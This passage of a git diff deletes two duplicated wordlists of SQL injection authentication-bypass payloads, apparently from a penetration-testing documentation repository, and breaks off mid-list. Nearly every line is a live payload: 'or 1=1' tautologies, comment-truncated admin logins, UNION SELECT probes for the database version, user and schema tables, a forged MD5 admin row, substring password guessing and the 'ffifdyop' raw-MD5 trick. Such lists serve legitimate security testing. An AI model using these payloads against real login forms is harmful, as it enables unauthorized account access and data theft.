-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
-')oR/**/2/*
-')oR/**/2/**/oR('
-")oR("2
-")oR"2"-- 2
-")oR"2"#
-")oR"2"/*
-")oR"2"oR("
-")oR(2)-- 2
-")oR(2)#
-")oR(2)/*
-")oR(2)oR("
-")oR 2-- 2
-")oR 2#
-")oR 2/*
-")oR 2 oR("
-")oR/**/2-- 2
-")oR/**/2#
-")oR/**/2/*
-")oR/**/2/**/oR("
-')oR'2'=('2
-')oR'2'='2'oR('
-')oR'2'='2'-- 2
-')oR'2'='2'#
-')oR'2'='2'/*
-')oR'2'='2'oR('
-')oR 2=2-- 2
-')oR 2=2#
-')oR 2=2/*
-')oR 2=2 oR('
-')oR/**/2=2-- 2
-')oR/**/2=2#
-')oR/**/2=2/*
-')oR/**/2=2/**/oR('
-')oR(2)=2-- 2
-')oR(2)=2#
-')oR(2)=2/*
-')oR(2)=2/*
-')oR(2)=(2)oR('
-')oR'2'='2' LimIT 1-- 2
-')oR'2'='2' LimIT 1#
-')oR'2'='2' LimIT 1/*
-')oR(2)=(2)LimIT(1)-- 2
-')oR(2)=(2)LimIT(1)#
-')oR(2)=(2)LimIT(1)/*
-")oR"2"=("2
-")oR"2"="2"oR("
-")oR"2"="2"-- 2
-")oR"2"="2"#
-")oR"2"="2"/*
-")oR"2"="2"oR("
-")oR 2=2-- 2
-")oR 2=2#
-")oR 2=2/*
-")oR 2=2 oR("
-")oR/**/2=2-- 2
-")oR/**/2=2#
-")oR/**/2=2/*
-")oR/**/2=2/**/oR("
-")oR(2)=2-- 2
-")oR(2)=2#
-")oR(2)=2/*
-")oR(2)=2/*
-")oR(2)=(2)oR("
-")oR"2"="2" LimIT 1-- 2
-")oR"2"="2" LimIT 1#
-")oR"2"="2" LimIT 1/*
-")oR(2)=(2)LimIT(1)-- 2
-")oR(2)=(2)LimIT(1)#
-")oR(2)=(2)LimIT(1)/*
-')oR true-- 2
-')oR true#
-')oR true/*
-')oR true oR('
-')oR(true)-- 2
-')oR(true)#
-')oR(true)/*
-')oR(true)oR('
-')oR/**/true-- 2
-')oR/**/true#
-')oR/**/true/*
-')oR/**/true/**/oR('
-")oR true-- 2
-")oR true#
-")oR true/*
-")oR true oR("
-")oR(true)-- 2
-")oR(true)#
-")oR(true)/*
-")oR(true)oR("
-")oR/**/true-- 2
-")oR/**/true#
-")oR/**/true/*
-")oR/**/true/**/oR("
-')oR'2'LiKE('2
-')oR'2'LiKE'2'-- 2
-')oR'2'LiKE'2'#
-')oR'2'LiKE'2'/*
-')oR'2'LiKE'2'oR('
-')oR(2)LiKE(2)-- 2
-')oR(2)LiKE(2)#
-')oR(2)LiKE(2)/*
-')oR(2)LiKE(2)oR('
-")oR"2"LiKE("2
-")oR"2"LiKE"2"-- 2
-")oR"2"LiKE"2"#
-")oR"2"LiKE"2"/*
-")oR"2"LiKE"2"oR("
-")oR(2)LiKE(2)-- 2
-")oR(2)LiKE(2)#
-")oR(2)LiKE(2)/*
-")oR(2)LiKE(2)oR("
-admin')-- 2
-admin')#
-admin')/*
-admin")-- 2
-admin")#
-') UniON SElecT 1,2-- 2
-') UniON SElecT 1,2,3-- 2
-') UniON SElecT 1,2,3,4-- 2
-') UniON SElecT 1,2,3,4,5-- 2
-') UniON SElecT 1,2#
-') UniON SElecT 1,2,3#
-') UniON SElecT 1,2,3,4#
-') UniON SElecT 1,2,3,4,5#
-')UniON(SElecT(1),2)-- 2
-')UniON(SElecT(1),2,3)-- 2
-')UniON(SElecT(1),2,3,4)-- 2
-')UniON(SElecT(1),2,3,4,5)-- 2
-')UniON(SElecT(1),2)#
-')UniON(SElecT(1),2,3)#
-')UniON(SElecT(1),2,3,4)#
-')UniON(SElecT(1),2,3,4,5)#
-") UniON SElecT 1,2-- 2
-") UniON SElecT 1,2,3-- 2
-") UniON SElecT 1,2,3,4-- 2
-") UniON SElecT 1,2,3,4,5-- 2
-") UniON SElecT 1,2#
-") UniON SElecT 1,2,3#
-") UniON SElecT 1,2,3,4#
-") UniON SElecT 1,2,3,4,5#
-")UniON(SElecT(1),2)-- 2
-")UniON(SElecT(1),2,3)-- 2
-")UniON(SElecT(1),2,3,4)-- 2
-")UniON(SElecT(1),2,3,4,5)-- 2
-")UniON(SElecT(1),2)#
-")UniON(SElecT(1),2,3)#
-")UniON(SElecT(1),2,3,4)#
-")UniON(SElecT(1),2,3,4,5)#
-')||('2
-')||2-- 2
-')||'2'||('
-')||2#
-')||2/*
-')||2||('
-")||("2
-")||2-- 2
-")||"2"||("
-")||2#
-")||2/*
-")||2||("
-')||'2'=('2
-')||'2'='2'||('
-')||2=2-- 2
-')||2=2#
-')||2=2/*
-')||2=2||('
-")||"2"=("2
-")||"2"="2"||("
-")||2=2-- 2
-")||2=2#
-")||2=2/*
-")||2=2||("
-')||2=(2)LimIT(1)-- 2
-')||2=(2)LimIT(1)#
-')||2=(2)LimIT(1)/*
-")||2=(2)LimIT(1)-- 2
-")||2=(2)LimIT(1)#
-")||2=(2)LimIT(1)/*
-')||true-- 2
-')||true#
-')||true/*
-')||true||('
-")||true-- 2
-")||true#
-")||true/*
-")||true||("
-')||'2'LiKE('2
-')||'2'LiKE'2'-- 2
-')||'2'LiKE'2'#
-')||'2'LiKE'2'/*
-')||'2'LiKE'2'||('
-')||(2)LiKE(2)-- 2
-')||(2)LiKE(2)#
-')||(2)LiKE(2)/*
-')||(2)LiKE(2)||('
-")||"2"LiKE("2
-")||"2"LiKE"2"-- 2
-")||"2"LiKE"2"#
-")||"2"LiKE"2"/*
-")||"2"LiKE"2"||("
-")||(2)LiKE(2)-- 2
-")||(2)LiKE(2)#
-")||(2)LiKE(2)/*
-")||(2)LiKE(2)||("
-' UnION SELeCT 1,2`
-' UnION SELeCT 1,2,3`
-' UnION SELeCT 1,2,3,4`
-' UnION SELeCT 1,2,3,4,5`
-" UnION SELeCT 1,2`
-" UnION SELeCT 1,2,3`
-" UnION SELeCT 1,2,3,4`
-" UnION SELeCT 1,2,3,4,5`
\ No newline at end of file
diff --git a/src/images/sqli-authbypass-long (1) (1) (1) (1).txt b/src/images/sqli-authbypass-long (1) (1) (1) (1).txt
deleted file mode 100644
index 5a03da57f..000000000
--- a/src/images/sqli-authbypass-long (1) (1) (1) (1).txt
+++ /dev/null
@@ -1,771 +0,0 @@
-'-'
-' '
-'&'
-'^'
-'*'
-' or ''-'
-' or '' '
-' or ''&'
-' or ''^'
-' or ''*'
-"-"
-" "
-"&"
-"^"
-"*"
-" or ""-"
-" or "" "
-" or ""&"
-" or ""^"
-" or ""*"
-or true--
-" or true--
-' or true--
-") or true--
-') or true--
-' or 'x'='x
-') or ('x')=('x
-')) or (('x'))=(('x
-" or "x"="x
-") or ("x")=("x
-")) or (("x"))=(("x
-or 1=1
-or 1=1--
-or 1=1#
-or 1=1/*
-admin' --
-admin' #
-admin'/*
-admin' or '1'='1
-admin' or '1'='1'--
-admin' or '1'='1'#
-admin' or '1'='1'/*
-admin'or 1=1 or ''='
-admin' or 1=1
-admin' or 1=1--
-admin' or 1=1#
-admin' or 1=1/*
-admin') or ('1'='1
-admin') or ('1'='1'--
-admin') or ('1'='1'#
-admin') or ('1'='1'/*
-admin') or '1'='1
-admin') or '1'='1'--
-admin') or '1'='1'#
-admin') or '1'='1'/*
-1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
-admin" --
-admin" #
-admin"/*
-admin" or "1"="1
-admin" or "1"="1"--
-admin" or "1"="1"#
-admin" or "1"="1"/*
-admin"or 1=1 or ""="
-admin" or 1=1
-admin" or 1=1--
-admin" or 1=1#
-admin" or 1=1/*
-admin") or ("1"="1
-admin") or ("1"="1"--
-admin") or ("1"="1"#
-admin") or ("1"="1"/*
-admin") or "1"="1
-admin") or "1"="1"--
-admin") or "1"="1"#
-admin") or "1"="1"/*
-1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
-==
-=
-'
-' --
-' #
-' –
-'--
-'/*
-'#
-" --
-" #
-"/*
-' and 1='1
-' and a='a
- or 1=1
- or true
-' or ''='
-" or ""="
-1′) and '1′='1–
-' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
-" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
- and 1=1
- and 1=1–
-' and 'one'='one
-' and 'one'='one–
-' group by password having 1=1--
-' group by userid having 1=1--
-' group by username having 1=1--
- like '%'
- or 0=0 --
- or 0=0 #
- or 0=0 –
-' or 0=0 #
-' or 0=0 --
-' or 0=0 #
-' or 0=0 –
-" or 0=0 --
-" or 0=0 #
-" or 0=0 –
-%' or '0'='0
- or 1=1
- or 1=1--
- or 1=1/*
- or 1=1#
- or 1=1–
-' or 1=1--
-' or '1'='1
-' or '1'='1'--
-' or '1'='1'/*
-' or '1'='1'#
-' or '1′='1
-' or 1=1
-' or 1=1 --
-' or 1=1 –
-' or 1=1--
-' or 1=1;#
-' or 1=1/*
-' or 1=1#
-' or 1=1–
-') or '1'='1
-') or '1'='1--
-') or '1'='1'--
-') or '1'='1'/*
-') or '1'='1'#
-') or ('1'='1
-') or ('1'='1--
-') or ('1'='1'--
-') or ('1'='1'/*
-') or ('1'='1'#
-'or'1=1
-'or'1=1′
-" or "1"="1
-" or "1"="1"--
-" or "1"="1"/*
-" or "1"="1"#
-" or 1=1
-" or 1=1 --
-" or 1=1 –
-" or 1=1--
-" or 1=1/*
-" or 1=1#
-" or 1=1–
-") or "1"="1
-") or "1"="1"--
-") or "1"="1"/*
-") or "1"="1"#
-") or ("1"="1
-") or ("1"="1"--
-") or ("1"="1"/*
-") or ("1"="1"#
-) or '1′='1–
-) or ('1′='1–
-' or 1=1 LIMIT 1;#
-'or 1=1 or ''='
-"or 1=1 or ""="
-' or 'a'='a
-' or a=a--
-' or a=a–
-') or ('a'='a
-" or "a"="a
-") or ("a"="a
-') or ('a'='a and hi") or ("a"="a
-' or 'one'='one
-' or 'one'='one–
-' or uid like '%
-' or uname like '%
-' or userid like '%
-' or user like '%
-' or username like '%
-' or 'x'='x
-') or ('x'='x
-" or "x"="x
-' OR 'x'='x'#;
-'=' 'or' and '=' 'or'
-' UNION ALL SELECT 1, @@version;#
-' UNION ALL SELECT system_user(),user();#
-' UNION select table_schema,table_name FROM information_Schema.tables;#
-admin' and substring(password/text(),1,1)='7
-' and substring(password/text(),1,1)='7
-
-==
-=
-'
-"
-'-- 2
-'/*
-'#
-"-- 2
-" #
-"/*
-'-'
-'&'
-'^'
-'*'
-'='
-0'<'2
-"-"
-"&"
-"^"
-"*"
-"="
-0"<"2
-
-')
-")
-')-- 2
-')/*
-')#
-")-- 2
-") #
-")/*
-')-('
-')&('
-')^('
-')*('
-')=('
-0')<('2
-")-("
-")&("
-")^("
-")*("
-")=("
-0")<("2
-
-'-''-- 2
-'-''#
-'-''/*
-'&''-- 2
-'&''#
-'&''/*
-'^''-- 2
-'^''#
-'^''/*
-'*''-- 2
-'*''#
-'*''/*
-'=''-- 2
-'=''#
-'=''/*
-0'<'2'-- 2
-0'<'2'#
-0'<'2'/*
-"-""-- 2
-"-""#
-"-""/*
-"&""-- 2
-"&""#
-"&""/*
-"^""-- 2
-"^""#
-"^""/*
-"*""-- 2
-"*""#
-"*""/*
-"=""-- 2
-"=""#
-"=""/*
-0"<"2"-- 2
-0"<"2"#
-0"<"2"/*
-
-')-''-- 2
-')-''#
-')-''/*
-')&''-- 2
-')&''#
-')&''/*
-')^''-- 2
-')^''#
-')^''/*
-')*''-- 2
-')*''#
-')*''/*
-')=''-- 2
-')=''#
-')=''/*
-0')<'2'-- 2
-0')<'2'#
-0')<'2'/*
-")-""-- 2
-")-""#
-")-""/*
-")&""-- 2
-")&""#
-")&""/*
-")^""-- 2
-")^""#
-")^""/*
-")*""-- 2
-")*""#
-")*""/*
-")=""-- 2
-")=""#
-")=""/*
-0")<"2-- 2
-0")<"2#
-0")<"2/*
-
-
-'oR'2
-'oR'2'-- 2
-'oR'2'#
-'oR'2'/*
-'oR'2'oR'
-'oR(2)-- 2
-'oR(2)#
-'oR(2)/*
-'oR(2)oR'
-'oR 2-- 2
-'oR 2#
-'oR 2/*
-'oR 2 oR'
-'oR/**/2-- 2
-'oR/**/2#
-'oR/**/2/*
-'oR/**/2/**/oR'
-"oR"2
-"oR"2"-- 2
-"oR"2"#
-"oR"2"/*
-"oR"2"oR"
-"oR(2)-- 2
-"oR(2)#
-"oR(2)/*
-"oR(2)oR"
-"oR 2-- 2
-"oR 2#
-"oR 2/*
-"oR 2 oR"
-"oR/**/2-- 2
-"oR/**/2#
-"oR/**/2/*
-"oR/**/2/**/oR"
-
-'oR'2'='2
-'oR'2'='2'oR'
-'oR'2'='2'-- 2
-'oR'2'='2'#
-'oR'2'='2'/*
-'oR'2'='2'oR'
-'oR 2=2-- 2
-'oR 2=2#
-'oR 2=2/*
-'oR 2=2 oR'
-'oR/**/2=2-- 2
-'oR/**/2=2#
-'oR/**/2=2/*
-'oR/**/2=2/**/oR'
-'oR(2)=2-- 2
-'oR(2)=2#
-'oR(2)=2/*
-'oR(2)=2/*
-'oR(2)=(2)oR'
-'oR'2'='2' LimIT 1-- 2
-'oR'2'='2' LimIT 1#
-'oR'2'='2' LimIT 1/*
-'oR(2)=(2)LimIT(1)-- 2
-'oR(2)=(2)LimIT(1)#
-'oR(2)=(2)LimIT(1)/*
-"oR"2"="2
-"oR"2"="2"oR"
-"oR"2"="2"-- 2
-"oR"2"="2"#
-"oR"2"="2"/*
-"oR"2"="2"oR"
-"oR 2=2-- 2
-"oR 2=2#
-"oR 2=2/*
-"oR 2=2 oR"
-"oR/**/2=2-- 2
-"oR/**/2=2#
-"oR/**/2=2/*
-"oR/**/2=2/**/oR"
-"oR(2)=2-- 2
-"oR(2)=2#
-"oR(2)=2/*
-"oR(2)=2/*
-"oR(2)=(2)oR"
-"oR"2"="2" LimIT 1-- 2
-"oR"2"="2" LimIT 1#
-"oR"2"="2" LimIT 1/*
-"oR(2)=(2)LimIT(1)-- 2
-"oR(2)=(2)LimIT(1)#
-"oR(2)=(2)LimIT(1)/*
-
-'oR true-- 2
-'oR true#
-'oR true/*
-'oR true oR'
-'oR(true)-- 2
-'oR(true)#
-'oR(true)/*
-'oR(true)oR'
-'oR/**/true-- 2
-'oR/**/true#
-'oR/**/true/*
-'oR/**/true/**/oR'
-"oR true-- 2
-"oR true#
-"oR true/*
-"oR true oR"
-"oR(true)-- 2
-"oR(true)#
-"oR(true)/*
-"oR(true)oR"
-"oR/**/true-- 2
-"oR/**/true#
-"oR/**/true/*
-"oR/**/true/**/oR"
-
-'oR'2'LiKE'2
-'oR'2'LiKE'2'-- 2
-'oR'2'LiKE'2'#
-'oR'2'LiKE'2'/*
-'oR'2'LiKE'2'oR'
-'oR(2)LiKE(2)-- 2
-'oR(2)LiKE(2)#
-'oR(2)LiKE(2)/*
-'oR(2)LiKE(2)oR'
-"oR"2"LiKE"2
-"oR"2"LiKE"2"-- 2
-"oR"2"LiKE"2"#
-"oR"2"LiKE"2"/*
-"oR"2"LiKE"2"oR"
-"oR(2)LiKE(2)-- 2
-"oR(2)LiKE(2)#
-"oR(2)LiKE(2)/*
-"oR(2)LiKE(2)oR"
-
-admin
-admin'-- 2
-admin'#
-admin'/*
-admin"-- 2
-admin"#
-ffifdyop
-
-' UniON SElecT 1,2-- 2
-' UniON SElecT 1,2,3-- 2
-' UniON SElecT 1,2,3,4-- 2
-' UniON SElecT 1,2,3,4,5-- 2
-' UniON SElecT 1,2#
-' UniON SElecT 1,2,3#
-' UniON SElecT 1,2,3,4#
-' UniON SElecT 1,2,3,4,5#
-'UniON(SElecT(1),2)-- 2
-'UniON(SElecT(1),2,3)-- 2
-'UniON(SElecT(1),2,3,4)-- 2
-'UniON(SElecT(1),2,3,4,5)-- 2
-'UniON(SElecT(1),2)#
-'UniON(SElecT(1),2,3)#
-'UniON(SElecT(1),2,3,4)#
-'UniON(SElecT(1),2,3,4,5)#
-" UniON SElecT 1,2-- 2
-" UniON SElecT 1,2,3-- 2
-" UniON SElecT 1,2,3,4-- 2
-" UniON SElecT 1,2,3,4,5-- 2
-" UniON SElecT 1,2#
-" UniON SElecT 1,2,3#
-" UniON SElecT 1,2,3,4#
-" UniON SElecT 1,2,3,4,5#
-"UniON(SElecT(1),2)-- 2
-"UniON(SElecT(1),2,3)-- 2
-"UniON(SElecT(1),2,3,4)-- 2
-"UniON(SElecT(1),2,3,4,5)-- 2
-"UniON(SElecT(1),2)#
-"UniON(SElecT(1),2,3)#
-"UniON(SElecT(1),2,3,4)#
-"UniON(SElecT(1),2,3,4,5)#
-
-'||'2
-'||2-- 2
-'||'2'||'
-'||2#
-'||2/*
-'||2||'
-"||"2
-"||2-- 2
-"||"2"||"
-"||2#
-"||2/*
-"||2||"
-'||'2'='2
-'||'2'='2'||'
-'||2=2-- 2
-'||2=2#
-'||2=2/*
-'||2=2||'
-"||"2"="2
-"||"2"="2"||"
-"||2=2-- 2
-"||2=2#
-"||2=2/*
-"||2=2||"
-'||2=(2)LimIT(1)-- 2
-'||2=(2)LimIT(1)#
-'||2=(2)LimIT(1)/*
-"||2=(2)LimIT(1)-- 2
-"||2=(2)LimIT(1)#
-"||2=(2)LimIT(1)/*
-'||true-- 2
-'||true#
-'||true/*
-'||true||'
-"||true-- 2
-"||true#
-"||true/*
-"||true||"
-'||'2'LiKE'2
-'||'2'LiKE'2'-- 2
-'||'2'LiKE'2'#
-'||'2'LiKE'2'/*
-'||'2'LiKE'2'||'
-'||(2)LiKE(2)-- 2
-'||(2)LiKE(2)#
-'||(2)LiKE(2)/*
-'||(2)LiKE(2)||'
-"||"2"LiKE"2
-"||"2"LiKE"2"-- 2
-"||"2"LiKE"2"#
-"||"2"LiKE"2"/*
-"||"2"LiKE"2"||"
-"||(2)LiKE(2)-- 2
-"||(2)LiKE(2)#
-"||(2)LiKE(2)/*
-"||(2)LiKE(2)||"
-
-')oR('2
-')oR'2'-- 2
-')oR'2'#
-')oR'2'/*
-')oR'2'oR('
-')oR(2)-- 2
-')oR(2)#
-')oR(2)/*
-')oR(2)oR('
-')oR 2-- 2
-')oR 2#
-')oR 2/*
-')oR 2 oR('
-')oR/**/2-- 2
-')oR/**/2#
